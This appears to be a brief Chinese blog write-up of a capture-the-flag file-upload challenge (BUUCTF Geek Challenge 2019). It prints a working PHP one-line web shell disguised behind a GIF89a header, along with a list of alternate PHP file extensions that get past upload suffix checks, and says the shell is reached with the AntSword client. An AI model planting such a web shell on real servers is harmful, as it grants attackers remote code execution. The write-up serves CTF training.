BUUCTF-极客大挑战 2019 Upload

发表于 2020-02-17| 更新于 2020-05-11|WPWEB

阅读量:

极客大挑战 2019 Upload

打开题目是个上传，随便上传一个图片竟然告诉我NOT image
所以考虑一下文件类型绕过

1
2
3

常用一句话：
GIF89a? 
<script language="php">eval($_REQUEST[shell])</script>

PHP绕过后缀名检测：

1	php,php3,php4,php5,phtml.pht

avatar

上传成功，用蚁剑连接
在根目录下得到flag

注意，文件都存在upload目录下

文章作者: 51nd0re1

文章链接: http://yoursite.com/2020/02/17/BUUCTF-%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-Upload/

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 51nd0re1！

微信
支付寶

相关推荐

BUUCTF-De1CTF2019 SSRF Me

BUUCTF-Easy Calc

BUUCTF-EasySQL 1

BUUCTF-Hack World

本地搜索

由 hexo-generator-search 提供支持